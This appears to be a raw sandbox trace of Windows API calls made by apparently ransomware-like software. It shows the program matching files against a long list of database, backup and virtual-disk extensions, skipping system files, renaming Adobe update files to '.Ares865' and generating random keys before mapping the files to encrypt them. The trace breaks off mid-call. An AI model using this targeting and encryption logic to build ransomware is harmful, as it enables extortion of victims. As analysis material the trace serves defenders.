[0091.105] lstrlenW (lpString="his") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="his") returned 1 [0091.105] lstrlenW (lpString="ib") returned 2 [0091.105] lstrcmpiW (lpString1="sp", lpString2="ib") returned 1 [0091.105] lstrlenW (lpString="idb") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="idb") returned 1 [0091.105] lstrlenW (lpString="ihx") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="ihx") returned 1 [0091.105] lstrlenW (lpString="itdb") returned 4 [0091.105] lstrcmpiW (lpString1=".msp", lpString2="itdb") returned -1 [0091.105] lstrlenW (lpString="itw") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="itw") returned 1 [0091.105] lstrlenW (lpString="jet") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="jet") returned 1 [0091.105] lstrlenW (lpString="jtx") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="jtx") returned 1 [0091.105] lstrlenW (lpString="kdb") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="kdb") returned 1 [0091.105] lstrlenW (lpString="kexi") returned 4 [0091.105] lstrcmpiW (lpString1=".msp", lpString2="kexi") returned -1 [0091.105] lstrlenW (lpString="kexic") returned 5 [0091.105] lstrcmpiW (lpString1="I.msp", lpString2="kexic") returned -1 [0091.105] lstrlenW (lpString="kexis") returned 5 [0091.105] lstrcmpiW (lpString1="I.msp", lpString2="kexis") returned -1 [0091.105] lstrlenW (lpString="lgc") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="lgc") returned 1 [0091.106] lstrlenW (lpString="lwx") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="lwx") returned 1 [0091.106] lstrlenW (lpString="maf") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="maf") returned 1 [0091.106] lstrlenW (lpString="maq") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="maq") returned 1 [0091.106] lstrlenW (lpString="mar") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mar") returned 1 [0091.106] lstrlenW (lpString="marshal") returned 7 [0091.106] lstrcmpiW (lpString1="MUI.msp", lpString2="marshal") returned 1 [0091.106] lstrlenW (lpString="mas") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mas") returned 1 [0091.106] lstrlenW (lpString="mav") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mav") returned 1 [0091.106] lstrlenW (lpString="maw") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="maw") returned 1 [0091.106] lstrlenW (lpString="mdbhtml") returned 7 [0091.106] lstrcmpiW (lpString1="MUI.msp", lpString2="mdbhtml") returned 1 [0091.106] lstrlenW (lpString="mdn") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mdn") returned 1 [0091.106] lstrlenW (lpString="mdt") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mdt") returned 1 [0091.106] lstrlenW (lpString="mfd") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mfd") returned 1 [0091.106] lstrlenW (lpString="mpd") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mpd") returned 1 [0091.106] lstrlenW (lpString="mrg") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mrg") returned 1 [0091.106] lstrlenW (lpString="mud") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mud") returned -1 [0091.106] lstrlenW (lpString="mwb") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="mwb") returned -1 [0091.106] lstrlenW (lpString="myd") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="myd") returned -1 [0091.106] lstrlenW (lpString="ndf") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="ndf") returned -1 [0091.106] lstrlenW (lpString="nnt") returned 3 [0091.106] lstrcmpiW (lpString1="msp", lpString2="nnt") returned -1 [0091.107] lstrlenW (lpString="nrmlib") returned 6 [0091.107] lstrcmpiW (lpString1="UI.msp", lpString2="nrmlib") returned 1 [0091.107] lstrlenW (lpString="ns2") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="ns2") returned -1 [0091.107] lstrlenW (lpString="ns3") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="ns3") returned -1 [0091.107] lstrlenW (lpString="ns4") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="ns4") returned -1 [0091.107] lstrlenW (lpString="nsf") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="nsf") returned -1 [0091.107] lstrlenW (lpString="nv") returned 2 [0091.107] lstrcmpiW (lpString1="sp", lpString2="nv") returned 1 [0091.107] lstrlenW (lpString="nv2") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="nv2") returned -1 [0091.107] lstrlenW (lpString="nwdb") returned 4 [0091.107] lstrcmpiW (lpString1=".msp", lpString2="nwdb") returned -1 [0091.107] lstrlenW (lpString="nyf") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="nyf") returned -1 [0091.107] lstrlenW (lpString="odb") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="odb") returned -1 [0091.107] lstrlenW (lpString="odb") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="odb") returned -1 [0091.107] lstrlenW (lpString="oqy") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="oqy") returned -1 [0091.107] lstrlenW (lpString="ora") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="ora") returned -1 [0091.107] lstrlenW (lpString="orx") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="orx") returned -1 [0091.107] lstrlenW (lpString="owc") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="owc") returned -1 [0091.107] lstrlenW (lpString="p96") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="p96") returned -1 [0091.107] lstrlenW (lpString="p97") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="p97") returned -1 [0091.107] lstrlenW (lpString="pan") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="pan") returned -1 [0091.107] lstrlenW (lpString="pdb") returned 3 [0091.107] lstrcmpiW (lpString1="msp", lpString2="pdb") returned -1 [0091.107] lstrlenW (lpString="pdm") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="pdm") returned -1 [0091.108] lstrlenW (lpString="pnz") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="pnz") returned -1 [0091.108] lstrlenW (lpString="qry") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="qry") returned -1 [0091.108] lstrlenW (lpString="qvd") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="qvd") returned -1 [0091.108] lstrlenW (lpString="rbf") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="rbf") returned -1 [0091.108] lstrlenW (lpString="rctd") returned 4 [0091.108] lstrcmpiW (lpString1=".msp", lpString2="rctd") returned -1 [0091.108] lstrlenW (lpString="rod") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="rod") returned -1 [0091.108] lstrlenW (lpString="rodx") returned 4 [0091.108] lstrcmpiW (lpString1=".msp", lpString2="rodx") returned -1 [0091.108] lstrlenW (lpString="rpd") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="rpd") returned -1 [0091.108] lstrlenW (lpString="rsd") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="rsd") returned -1 [0091.108] lstrlenW (lpString="sas7bdat") returned 8 [0091.108] lstrcmpiW (lpString1="_MUI.msp", lpString2="sas7bdat") returned -1 [0091.108] lstrlenW (lpString="sbf") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="sbf") returned -1 [0091.108] lstrlenW (lpString="scx") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="scx") returned -1 [0091.108] lstrlenW (lpString="sdb") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="sdb") returned -1 [0091.108] lstrlenW (lpString="sdc") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="sdc") returned -1 [0091.108] lstrlenW (lpString="sdf") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="sdf") returned -1 [0091.108] lstrlenW (lpString="sis") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="sis") returned -1 [0091.108] lstrlenW (lpString="spq") returned 3 [0091.108] lstrcmpiW (lpString1="msp", lpString2="spq") returned -1 [0091.108] lstrlenW (lpString="te") returned 2 [0091.108] lstrcmpiW (lpString1="sp", lpString2="te") returned -1 [0091.109] lstrlenW (lpString="teacher") returned 7 [0091.109] lstrcmpiW (lpString1="MUI.msp", lpString2="teacher") returned -1 [0091.109] lstrlenW (lpString="tmd") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="tmd") returned -1 [0091.109] lstrlenW (lpString="tps") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="tps") returned -1 [0091.109] lstrlenW (lpString="trc") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="trc") returned -1 [0091.109] lstrlenW (lpString="trc") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="trc") returned -1 [0091.109] lstrlenW (lpString="trm") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="trm") returned -1 [0091.109] lstrlenW (lpString="udb") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="udb") returned -1 [0091.109] lstrlenW (lpString="udl") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="udl") returned -1 [0091.109] lstrlenW (lpString="usr") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="usr") returned -1 [0091.109] lstrlenW (lpString="v12") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="v12") returned -1 [0091.109] lstrlenW (lpString="vis") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="vis") returned -1 [0091.109] lstrlenW (lpString="vpd") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="vpd") returned -1 [0091.109] lstrlenW (lpString="vvv") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="vvv") returned -1 [0091.109] lstrlenW (lpString="wdb") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="wdb") returned -1 [0091.109] lstrlenW (lpString="wmdb") returned 4 [0091.109] lstrcmpiW (lpString1=".msp", lpString2="wmdb") returned -1 [0091.109] lstrlenW (lpString="wrk") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="wrk") returned -1 [0091.109] lstrlenW (lpString="xdb") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="xdb") returned -1 [0091.109] lstrlenW (lpString="xld") returned 3 [0091.109] lstrcmpiW (lpString1="msp", lpString2="xld") returned -1 [0091.109] lstrlenW (lpString="xmlff") returned 5 [0091.109] lstrcmpiW (lpString1="I.msp", lpString2="xmlff") returned -1 [0091.110] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.Ares865") returned 244 [0091.110] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.ares865"), dwFlags=0x1) returned 1 [0091.111] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.111] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17707008) returned 1 [0091.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.111] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.112] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.112] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.112] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10e3300, lpName=0x0) returned 0x15c [0091.114] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1000000, dwNumberOfBytesToMap=0xe3300) returned 0xdd0000 [0091.288] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.289] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31b0d0 [0091.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31b0d0 | out: hHeap=0x2b0000) returned 1 [0091.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0091.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0091.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.289] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0091.297] CloseHandle (hObject=0x15c) returned 1 [0091.298] CloseHandle (hObject=0x118) returned 1 [0091.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.298] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.307] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="aoldtz.exe") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2=".") returned 1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="..") returned 1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="windows") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="bootmgr") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="temp") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="pagefile.sys") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="boot") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="ids.txt") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="ntuser.dat") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="perflogs") returned -1 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2="MSBuild") returned -1 [0091.307] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp") returned 23 [0091.307] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 236 [0091.307] lstrcpyW (in: lpString1=0x2cce5aa, lpString2="AdbeRdrUpd10116_MUI.msp" | out: lpString1="AdbeRdrUpd10116_MUI.msp") returned="AdbeRdrUpd10116_MUI.msp" [0091.307] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp") returned 23 [0091.307] lstrlenW (lpString="Ares865") returned 7 [0091.307] lstrcmpiW (lpString1="MUI.msp", lpString2="Ares865") returned 1 [0091.307] lstrlenW (lpString=".dll") returned 4 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2=".dll") returned 1 [0091.307] lstrlenW (lpString=".lnk") returned 4 [0091.307] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2=".lnk") returned 1 [0091.307] lstrlenW (lpString=".ini") returned 4 [0091.308] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2=".ini") returned 1 [0091.308] lstrlenW (lpString=".sys") returned 4 [0091.308] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp", lpString2=".sys") returned 1 [0091.308] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp") returned 23 [0091.308] lstrlenW (lpString="bak") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="bak") returned 1 [0091.308] lstrlenW (lpString="ba_") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="ba_") returned 1 [0091.308] lstrlenW (lpString="dbb") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="dbb") returned 1 [0091.308] lstrlenW (lpString="vmdk") returned 4 [0091.308] lstrcmpiW (lpString1=".msp", lpString2="vmdk") returned -1 [0091.308] lstrlenW (lpString="rar") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="rar") returned -1 [0091.308] lstrlenW (lpString="zip") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="zip") returned -1 [0091.308] lstrlenW (lpString="tgz") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="tgz") returned -1 [0091.308] lstrlenW (lpString="vbox") returned 4 [0091.308] lstrcmpiW (lpString1=".msp", lpString2="vbox") returned -1 [0091.308] lstrlenW (lpString="vdi") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="vdi") returned -1 [0091.308] lstrlenW (lpString="vhd") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="vhd") returned -1 [0091.308] lstrlenW (lpString="vhdx") returned 4 [0091.308] lstrcmpiW (lpString1=".msp", lpString2="vhdx") returned -1 [0091.308] lstrlenW (lpString="avhd") returned 4 [0091.308] lstrcmpiW (lpString1=".msp", lpString2="avhd") returned -1 [0091.308] lstrlenW (lpString="db") returned 2 [0091.308] lstrcmpiW (lpString1="sp", lpString2="db") returned 1 [0091.308] lstrlenW (lpString="db2") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="db2") returned 1 [0091.308] lstrlenW (lpString="db3") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="db3") returned 1 [0091.308] lstrlenW (lpString="dbf") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="dbf") returned 1 [0091.308] lstrlenW (lpString="mdf") returned 3 [0091.308] lstrcmpiW (lpString1="msp", lpString2="mdf") returned 1 [0091.309] lstrlenW (lpString="mdb") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="mdb") returned 1 [0091.309] lstrlenW (lpString="sql") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="sql") returned -1 [0091.309] lstrlenW (lpString="sqlite") returned 6 [0091.309] lstrcmpiW (lpString1="UI.msp", lpString2="sqlite") returned 1 [0091.309] lstrlenW (lpString="sqlite3") returned 7 [0091.309] lstrcmpiW (lpString1="MUI.msp", lpString2="sqlite3") returned -1 [0091.309] lstrlenW (lpString="sqlitedb") returned 8 [0091.309] lstrcmpiW (lpString1="_MUI.msp", lpString2="sqlitedb") returned -1 [0091.309] lstrlenW (lpString="xml") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="xml") returned -1 [0091.309] lstrlenW (lpString="$er") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="$er") returned 1 [0091.309] lstrlenW (lpString="4dd") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="4dd") returned 1 [0091.309] lstrlenW (lpString="4dl") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="4dl") returned 1 [0091.309] lstrlenW (lpString="^^^") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="^^^") returned 1 [0091.309] lstrlenW (lpString="abs") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="abs") returned 1 [0091.309] lstrlenW (lpString="abx") returned 3 [0091.309] lstrcmpiW (lpString1="msp", lpString2="abx") returned 1 [0091.309] lstrlenW (lpString="accdb") returned 5 [0091.309] lstrcmpiW (lpString1="I.msp", lpString2="accdb") returned 1 [0091.309] lstrlenW (lpString="accdc") returned 5 [0091.309] lstrcmpiW (lpString1="I.msp", lpString2="accdc") returned 1 [0091.309] lstrlenW (lpString="accde") returned 5 [0091.309] lstrcmpiW (lpString1="I.msp", lpString2="accde") returned 1 [0091.309] lstrlenW (lpString="accdr") returned 5 [0091.309] lstrcmpiW (lpString1="I.msp", lpString2="accdr") returned 1 [0091.309] lstrlenW (lpString="accdt") returned 5 [0091.309] lstrcmpiW (lpString1="I.msp", lpString2="accdt") returned 1 [0091.309] lstrlenW (lpString="accdw") returned 5 [0091.309] lstrcmpiW (lpString1="I.msp", lpString2="accdw") returned 1 [0091.309] lstrlenW (lpString="accft") returned 5 [0091.309] lstrcmpiW (lpString1="I.msp", lpString2="accft") returned 1 [0091.309] lstrlenW (lpString="adb") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="adb") returned 1 [0091.310] lstrlenW (lpString="adb") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="adb") returned 1 [0091.310] lstrlenW (lpString="ade") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="ade") returned 1 [0091.310] lstrlenW (lpString="adf") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="adf") returned 1 [0091.310] lstrlenW (lpString="adn") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="adn") returned 1 [0091.310] lstrlenW (lpString="adp") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="adp") returned 1 [0091.310] lstrlenW (lpString="alf") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="alf") returned 1 [0091.310] lstrlenW (lpString="ask") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="ask") returned 1 [0091.310] lstrlenW (lpString="btr") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="btr") returned 1 [0091.310] lstrlenW (lpString="cat") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="cat") returned 1 [0091.310] lstrlenW (lpString="cdb") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="cdb") returned 1 [0091.310] lstrlenW (lpString="ckp") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="ckp") returned 1 [0091.310] lstrlenW (lpString="cma") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="cma") returned 1 [0091.310] lstrlenW (lpString="cpd") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="cpd") returned 1 [0091.310] lstrlenW (lpString="dacpac") returned 6 [0091.310] lstrcmpiW (lpString1="UI.msp", lpString2="dacpac") returned 1 [0091.310] lstrlenW (lpString="dad") returned 3 [0091.310] lstrcmpiW (lpString1="msp", lpString2="dad") returned 1 [0091.310] lstrlenW (lpString="dadiagrams") returned 10 [0091.310] lstrcmpiW (lpString1="16_MUI.msp", lpString2="dadiagrams") returned -1 [0091.310] lstrlenW (lpString="daschema") returned 8 [0091.310] lstrcmpiW (lpString1="_MUI.msp", lpString2="daschema") returned -1 [0091.310] lstrlenW (lpString="db-journal") returned 10 [0091.310] lstrcmpiW (lpString1="16_MUI.msp", lpString2="db-journal") returned -1 [0091.310] lstrlenW (lpString="db-shm") returned 6 [0091.311] lstrcmpiW (lpString1="UI.msp", lpString2="db-shm") returned 1 [0091.311] lstrlenW (lpString="db-wal") returned 6 [0091.311] lstrcmpiW (lpString1="UI.msp", lpString2="db-wal") returned 1 [0091.311] lstrlenW (lpString="dbc") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dbc") returned 1 [0091.311] lstrlenW (lpString="dbs") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dbs") returned 1 [0091.311] lstrlenW (lpString="dbt") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dbt") returned 1 [0091.311] lstrlenW (lpString="dbv") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dbv") returned 1 [0091.311] lstrlenW (lpString="dbx") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dbx") returned 1 [0091.311] lstrlenW (lpString="dcb") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dcb") returned 1 [0091.311] lstrlenW (lpString="dct") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dct") returned 1 [0091.311] lstrlenW (lpString="dcx") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dcx") returned 1 [0091.311] lstrlenW (lpString="ddl") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="ddl") returned 1 [0091.311] lstrlenW (lpString="dlis") returned 4 [0091.311] lstrcmpiW (lpString1=".msp", lpString2="dlis") returned -1 [0091.311] lstrlenW (lpString="dp1") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dp1") returned 1 [0091.311] lstrlenW (lpString="dqy") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dqy") returned 1 [0091.311] lstrlenW (lpString="dsk") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dsk") returned 1 [0091.311] lstrlenW (lpString="dsn") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dsn") returned 1 [0091.311] lstrlenW (lpString="dtsx") returned 4 [0091.311] lstrcmpiW (lpString1=".msp", lpString2="dtsx") returned -1 [0091.311] lstrlenW (lpString="dxl") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="dxl") returned 1 [0091.311] lstrlenW (lpString="eco") returned 3 [0091.311] lstrcmpiW (lpString1="msp", lpString2="eco") returned 1 [0091.311] lstrlenW (lpString="ecx") returned 3 [0091.312] lstrcmpiW (lpString1="msp", lpString2="ecx") returned 1 [0091.312] lstrlenW (lpString="edb") returned 3 [0091.312] lstrcmpiW 